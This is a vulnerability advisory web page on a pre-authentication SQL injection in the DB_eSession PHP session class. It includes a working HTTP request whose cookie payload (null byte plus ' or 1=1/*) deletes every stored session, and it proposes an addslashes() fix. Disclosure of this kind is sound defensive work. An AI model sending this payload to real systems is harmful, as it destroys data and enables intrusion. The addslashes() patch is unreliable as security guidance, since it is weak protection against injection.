Search | Research | Contact Us Wednesday February 28, 2022
Most Viewed Items
  1 PHPXMLRPC Library Remote Code Execution
  2 Multiple Invision Power Board Vulnerabilities
  3 XOOPS 2.0.11 && Earlier Multiple Vulnerabilities
  4 Mambo Multiple Vulnerabilities
  5 PEAR XML_RPC Library Remote Code Execution
  6 eBay And Amazon Still Vulnerable
  7 Woltlab Burning Board SQL Injection Vulnerability
  8 When Small Mistakes Can Cause Big Problems
  9 WordPress And Earlier Multiple Vulnerabilities
10 MySQL Eventum Multiple Vulnerabilities
Need Secure Code?
Quick Search
You can use the form below to search our site. Just enter the keywords to search.
Home Services Archives Research Downloads Contact
DB_eSession deleteSession() SQL injection
February 11, 2022
Vendor : Lawrence Osiris
Version : DB_eSession <= 1.0.2
Risk : SQL Injection

DB_eSession is a feature-packed PHP class that stores the session data in a MySQL database rather than files. It is powerful, designed with security in mind, and is easy to utilize. The DB_eSession library is used in a number of popular web applications, and private projects alike. DB_eSession is vulnerable to SQL Injection attacks due to unsafe use of cookie data in an SQL query, and can allow an attacker to craft malicious SQL Queries and have them then successfully executed.

SQL Injection:
There is an SQL injection vulnerability in DB_eSession that allow for an attacker to perform pre authentication SQL Injection attacks against the vulnerable web application.
* Try and save the current session ID if one is defined already.
if (isSet($_COOKIE[$this->_sess_name]))
   $_sess_id_set = $_COOKIE[$this->_sess_name];
if (isSet($GLOBALS[$this->_sess_name]))
   $_sess_id_set = $GLOBALS[$this->_sess_name];
   $_sess_id_set = NULL;

The above code is from DB_eSession class @ lines 1080 - 1090 The variable $this->_sess_name is in most cases PHPSESSID, or set to a developer specified value. You should be able to tell from having a look at your cookies.

GET /example/index.php HTTP/1.1
User-Agent: Mozilla/5.0
Accept: text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: example=143263645564654563456345634563435%00' or 1=1/*

The above request would successfully delete all of the sessions in the database. The reason for the null byte is to get past having the application die @ line 1134. Depending on what the version of MySQL in use is, other attacks may be possible. The root of this problem is that unsafe data is taken from a cookie value and then passed to the deleteSession() function where it is then used in an SQL query.

The vendor was unresponsive to my contact attempts, but a fix is not too difficult @ line 1092 add the following code below the code shown @1080-1090

$_sess_id_set = ( empty($_sess_id_set) ) ? NULL: addslashes($_sess_id_set);

This should effectively stop any SQL Injection attacks against the vulnerable DB_eSession class.

James Bercegay of the GulfTech Security Research Team